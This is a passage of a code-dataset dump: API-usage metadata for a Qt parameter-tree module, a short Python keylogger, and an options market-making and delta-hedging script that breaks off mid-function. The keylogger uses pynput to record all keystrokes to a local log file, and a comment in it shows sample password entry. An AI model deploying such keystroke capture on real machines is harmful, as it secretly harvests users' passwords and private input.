"usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.SimpleParameter", "line_number": 579, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 579, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.SimpleParameter.__init__", "line_number": 583, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.SimpleParameter", "line_number": 583, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 583, "usage_type": "name"}, {"api_name": "pyqtgraph.functions", "line_number": 586, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDateTime", "line_number": 594, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDate", "line_number": 595, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 596, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLabel", "line_number": 599, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 599, "usage_type": "name"}, {"api_name": "pyqtgraph.functions", "line_number": 603, "usage_type": "call"}, {"api_name": "pyqtgraph.functions.mkColor", "line_number": 606, "usage_type": "call"}, {"api_name": "pyqtgraph.functions", "line_number": 606, "usage_type": "name"}, {"api_name": "pyqtgraph.colormap.ColorMap", "line_number": 609, "usage_type": "argument"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 629, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 630, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 631, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 632, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 633, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 634, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 635, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 636, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 637, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 638, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 639, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 640, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 643, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ListParameterItem", "line_number": 645, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 645, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QInputDialog.getText", "line_number": 742, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QInputDialog", "line_number": 742, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 742, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 743, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 743, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 764, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 764, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ListParameter", "line_number": 772, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 772, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 781, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 794, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 797, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 797, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 810, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 810, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QComboBox", "line_number": 811, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 811, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 813, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 813, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 815, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 815, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 816, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 816, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 816, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 830, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 830, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 830, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 832, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 832, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableWidget", "line_number": 879, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 879, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 888, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 888, "usage_type": "argument"}, {"api_name": "qtpy.QtWidgets.QTableWidget.__init__", "line_number": 891, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QTableWidget", "line_number": 891, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 891, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 902, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QTableWidgetItem", "line_number": 926, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 926, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.ItemIsEditable", "line_number": 927, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 927, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableWidgetItem", "line_number": 929, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 929, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableWidgetItem", "line_number": 931, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 931, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.ItemIsEditable", "line_number": 932, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 932, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 941, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 960, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 965, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 965, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 965, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 967, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 967, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 1028, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 1028, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1032, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.ColorButton.ColorButton", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.ColorButton", "line_number": 1032, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QStyledItemDelegate", "line_number": 1036, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1036, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableView", "line_number": 1044, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1044, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1053, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1054, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1055, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1056, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1057, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QMenu", "line_number": 1065, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1065, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1108, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1123, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 1129, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 1129, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1129, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 1131, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1131, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QAbstractItemView", "line_number": 1156, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1156, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QInputDialog.getText", "line_number": 1179, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QInputDialog", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1179, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1180, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 1199, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 1199, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 1205, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1205, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 1212, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1212, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 1214, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1214, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1216, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1216, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 1217, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1217, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1217, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QListWidget", "line_number": 1226, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1226, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QListWidget.__init__", "line_number": 1228, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QListWidget", "line_number": 1228, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1228, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QApplication.processEvents", "line_number": 1267, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QApplication", "line_number": 1267, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1267, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1273, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1284, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1294, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ActionParameterItem", "line_number": 1297, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1297, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ActionParameter", "line_number": 1308, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1308, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1313, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 1322, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1322, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1365, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1377, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog.getOpenFileName", "line_number": 1397, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog", "line_number": 1397, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1397, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1397, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1397, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 1399, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog", "line_number": 1399, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1399, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QFileDialog.getSaveFileName", "line_number": 1402, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog", "line_number": 1402, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1402, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1402, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1402, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 1418, "usage_type": "argument"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 1439, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1439, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPlainTextEdit", "line_number": 1440, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1440, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 1442, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1442, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1444, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1444, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 1445, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1445, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1445, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 1449, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1449, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1457, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1467, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 1470, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1470, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 1473, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 1473, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1473, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 1475, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1475, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QInputDialog.getText", "line_number": 1511, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QInputDialog", "line_number": 1511, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1511, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 1512, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1512, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 1517, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1517, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1528, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 1571, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1571, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPlainTextEdit", "line_number": 1572, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1572, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 1576, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1576, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1578, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1578, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 1579, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1579, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1579, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 1583, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1583, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1591, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1594, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1604, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.TextParameterItem", "line_number": 1607, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1607, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1614, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1619, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QApplication", "line_number": 1622, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1622, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 1622, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 1626, "usage_type": "call"}]} +{"seq_id": "131309950", "text": "import pynput\n\nfrom pynput.keyboard import Key, Listener\n\ncount=0\nkeys=[]\n\ndef on_press(key):\n global count, keys\n keys.append(key)\n count=count+1\n if count>=10:\n count=0\n write_file(keys)\n keys=[]\n\n\ndef write_file(keys):\n with open(\"./log.txt\",\"a\") as f:\n for key in keys:\n k=str(key).replace(\"'\",\"\")\n if k.find(\"space\") > 0:\n f.write(\"\\n\")\n elif k.find(\"Key\") == -1:\n f.write(k)\n \n\ndef on_release(key):\n if key == Key.esc:\n return False\n\nwith Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n\n# this is a test program please enter your password : hello_world please enter your pincode : 5623456", "sub_path": "keylogger/keylogger_exe.py", "file_name": "keylogger_exe.py", "file_ext": "py", "file_size_in_byte": 684, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pynput.keyboard.Key.esc", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 29, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "385806800", "text": "import datetime as dt\nimport time\nimport logging\nimport random\n\nfrom optibook.synchronous_client import Exchange\n\n\nfrom math import floor, ceil\nfrom black_scholes import call_value, put_value, call_delta, put_delta, call_vega, put_vega\nfrom libs import calculate_current_time_to_date\n\nexchange = Exchange()\nexchange.connect()\n\nlogging.getLogger('client').setLevel('ERROR')\n\nforce_delta_increase = False\nforce_delta_decrease = False\n\n\ndef limit_maker_man(strike, stock_value): \n maxx = 100\n if strike <= stock_value:\n ratio = strike / stock_value\n else:\n ratio = stock_value / strike\n return round(maxx * ratio,0)\n \n\ndef trade_would_breach_position_limit(instrument_id, volume, side, position_limit = 100):\n positions = exchange.get_positions()\n position_instrument = positions[instrument_id]\n\n if side == 'bid':\n return position_instrument + volume > position_limit\n elif side == 'ask':\n return position_instrument - volume < -position_limit\n else:\n raise Exception(f'''Invalid side provided: {side}, expecting 'bid' or 'ask'.''')\n\ndef round_down_to_tick(price, tick_size):\n \"\"\"\n Rounds a price down to the nearest tick, e.g. if the tick size is 0.10, a price of 0.97 will get rounded to 0.90.\n \"\"\"\n return floor(price / tick_size) * tick_size\n\n\ndef round_up_to_tick(price, tick_size):\n \"\"\"\n Rounds a price up to the nearest tick, e.g. if the tick size is 0.10, a price of 1.34 will get rounded to 1.40.\n \"\"\"\n return ceil(price / tick_size) * tick_size\n\n\ndef get_midpoint_value(instrument_id):\n \"\"\"\n This function calculates the current midpoint of the order book supplied by the exchange for the instrument\n specified by , returning None if either side or both sides do not have any orders available.\n \"\"\"\n order_book = exchange.get_last_price_book(instrument_id=instrument_id)\n\n # If the instrument doesn't have prices at all or on either side, we cannot calculate a midpoint and return None\n if not (order_book and order_book.bids and order_book.asks):\n return None\n else:\n midpoint = (order_book.bids[0].price + order_book.asks[0].price) / 2.0\n print(\"midpoint:\", midpoint)\n return midpoint\n\n\ndef calculate_theoretical_option_value(expiry_date, strike, callput, stock_value, interest_rate, volatility):\n \"\"\"\n This function calculates the current fair call or put value based on Black & Scholes assumptions.\n\n expiry_date: dt.date - Expiry date of the option\n strike: float - Strike price of the option\n callput: str - String 'call' or 'put' detailing what type of option this is\n stock_value: - Assumed stock value when calculating the Black-Scholes value\n interest_rate: - Assumed interest rate when calculating the Black-Scholes value\n volatility: - Assumed volatility of when calculating the Black-Scholes value\n \"\"\"\n time_to_expiry = calculate_current_time_to_date(expiry_date)\n\n if callput == 'call':\n option_value = call_value(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n elif callput == 'put':\n option_value = put_value(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n else:\n raise Exception(f\"\"\"Got unexpected value for callput argument, should be 'call' or 'put' but was {callput}.\"\"\")\n\n return option_value\n\n\ndef calculate_option_delta(expiry_date, strike, callput, stock_value, interest_rate, volatility):\n \"\"\"\n This function calculates the current option delta based on Black & Scholes assumptions.\n\n expiry_date: dt.date - Expiry date of the option\n strike: float - Strike price of the option\n callput: str - String 'call' or 'put' detailing what type of option this is\n stock_value: - Assumed stock value when calculating the Black-Scholes value\n interest_rate: - Assumed interest rate when calculating the Black-Scholes value\n volatility: - Assumed volatility of when calculating the Black-Scholes value\n \"\"\"\n time_to_expiry = calculate_current_time_to_date(expiry_date)\n\n if callput == 'call':\n option_value = call_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n elif callput == 'put':\n option_value = put_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n else:\n raise Exception(f\"\"\"Got unexpected value for callput argument, should be 'call' or 'put' but was {callput}.\"\"\")\n\n return option_value\n\n\ndef update_quotes(callput, option_id, theoretical_price, credit, volume, position_limit, tick_size):\n \"\"\"\n This function updates the quotes specified by . We take the following actions in sequence:\n - pull (remove) any current oustanding orders\n - add credit to theoretical price and round to nearest tick size to create a set of bid/ask quotes\n - calculate max volumes to insert as to not pass the position_limit\n - reinsert limit orders on those levels\n\n Arguments:\n option_id: str - Exchange Instrument ID of the option to trade\n theoretical_price: float - Price to quote around\n credit: float - Difference to subtract from/add to theoretical price to come to final bid/ask price\n volume: - Volume (# lots) of the inserted orders (given they do not breach position limits)\n position_limit: int - Position limit (long/short) to avoid crossing\n tick_size: float - Tick size of the quoted instrument\n \"\"\"\n\n # Print any new trades\n \n \n trades = exchange.poll_new_trades(instrument_id=option_id)\n for trade in trades:\n print(f'- Last period, traded {trade.volume} lots in {option_id} at price {trade.price:.2f}, side: {trade.side}.')\n\n # Pull (remove) all existing outstanding orders\n orders = exchange.get_outstanding_orders(instrument_id=option_id)\n \n old_bid_volume = 0\n old_ask_volume = 0\n for order_id, order in orders.items():\n print(f'- Deleting old {order.side} order in {option_id} for {order.volume} @ {order.price:8.2f}.')\n if order.side == 'ask':\n old_ask_volume = order.volume\n elif order.side == 'bid':\n old_bid_volume = order.volume\n exchange.delete_order(instrument_id=option_id, order_id=order_id)\n \n if old_bid_volume > 20:\n old_bid_volume = 20\n if old_ask_volume > 20:\n old_ask_volume = 20\n\n # Calculate bid and ask price\n bid_price = round_down_to_tick(theoretical_price - credit, tick_size)\n ask_price = round_up_to_tick(theoretical_price + credit, tick_size)\n \n book = exchange.get_last_price_book(option_id)\n if not book.bids or not book.asks:\n bid_price = bid_price\n ask_price = ask_price\n else:\n best_bid = round(float(book.bids[0].price),1)\n print(\"best_bid: \", best_bid)\n best_ask = round(float(book.asks[0].price),1)\n print(\"best_ask: \", best_ask)\n if best_bid > bid_price or bid_price > ask_price:\n if best_bid + 0.1 < best_ask - 0.1:\n bid_price = best_bid + 0.1\n else:\n bid_price = best_bid\n if best_ask < ask_price or ask_price < bid_price:\n if best_ask - 0.1 > best_bid +0.1:\n ask_price = best_ask - 0.1\n else:\n ask_price = best_ask\n \n \n if round(bid_price,1) == round(ask_price,1):\n if best_bid != best_ask:\n bid_price = best_bid\n ask_price = best_ask\n elif best_bid == best_ask:\n bid_price = best_bid - 0.1\n ask_price = best_ask + 0.1\n # Calculate bid and ask volumes, taking into account the provided position_limit\n position = exchange.get_positions()[option_id]\n \n if position > position_limit*0.5 or position < -position_limit*0.5:\n if position > 0:\n max_volume_to_buy = volume\n max_volume_to_sell = position + 2*volume\n else:\n max_volume_to_buy = 2*volume - position\n max_volume_to_sell = volume\n else:\n max_volume_to_buy = position_limit - position\n max_volume_to_sell = position_limit + position\n \n\n bid_volume = min(volume+old_bid_volume, max_volume_to_buy)\n ask_volume = min(volume+old_ask_volume, max_volume_to_sell)\n \n # Insert new limit orders\n if callput == \"call\":\n if bid_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'bid',position_limit = position_limit) and not force_delta_decrease:\n \n print(f'- Inserting bid limit order in {option_id} for {bid_volume} @ {bid_price:8.2f}.')\n exchange.insert_order(instrument_id=option_id, \n price=bid_price, \n volume=bid_volume, \n side='bid', \n order_type='limit', \n )\n \n if ask_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'ask',position_limit = position_limit) and not force_delta_increase:\n \n print(f'- Inserting ask limit order in {option_id} for {ask_volume} @ {ask_price:8.2f}.')\n exchange.insert_order(instrument_id=option_id, \n price=ask_price, \n volume=ask_volume, \n side='ask', \n order_type='limit', \n )\n \n elif callput == \"put\":\n \n if bid_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'bid',position_limit = position_limit) and not force_delta_increase:\n \n print(f'- Inserting bid limit order in {option_id} for {bid_volume} @ {bid_price:8.2f}.')\n exchange.insert_order(instrument_id=option_id, \n price=bid_price, \n volume=bid_volume, \n side='bid', \n order_type='limit', \n )\n \n if ask_volume > 0 and not trade_would_breach_position_limit(option_id, volume, 'ask',position_limit = position_limit) and not force_delta_decrease:\n \n print(f'- Inserting ask limit order in {option_id} for {ask_volume} @ {ask_price:8.2f}.')\n exchange.insert_order(instrument_id=option_id, \n price=ask_price, \n volume=ask_volume, \n side='ask', \n order_type='limit', \n )\n\n\ndef hedge_delta_position(stock_id, options, stock_value):\n \"\"\"\n This function (once finished) hedges the outstanding delta position by trading in the stock.\n\n That is:\n - It calculates how sensitive the total position value is to changes in the underlying by summing up all\n individual delta component.\n - And then trades stocks which have the opposite exposure, to remain, roughly, flat delta exposure\n\n Arguments:\n stock_id: str - Exchange Instrument ID of the stock to hedge with\n options: List[dict] - List of options with details to calculate and sum up delta positions for\n stock_value: float - The stock value to assume when making delta calculations using Black-Scholes\n \"\"\"\n\n # A3: Calculate the delta position here\n positions = exchange.get_positions()\n \n total_delta_position = 0\n book = exchange.get_last_price_book(stock_id)\n if not book.bids or not book.asks:\n return\n else:\n best_bid = float(book.bids[0].price)\n best_ask = float(book.asks[0].price)\n \n for option in options:\n if option['callput'] == 'put':\n position = positions[option['id']]\n print(f\"- The current position in the option {option} is {position}.\")\n option_delta = calculate_option_delta(expiry_date=option['expiry_date'],\n strike = option['strike'], \n callput = option['callput'], \n stock_value=best_ask, \n interest_rate = 0.0, \n volatility = 3.0)\n elif option['callput'] == 'call':\n position = positions[option['id']]\n print(f\"- The current position in the option {option} is {position}.\")\n option_delta = calculate_option_delta(expiry_date=option['expiry_date'],\n strike = option['strike'], \n callput = option['callput'], \n stock_value=best_bid, \n interest_rate = 0.0, \n 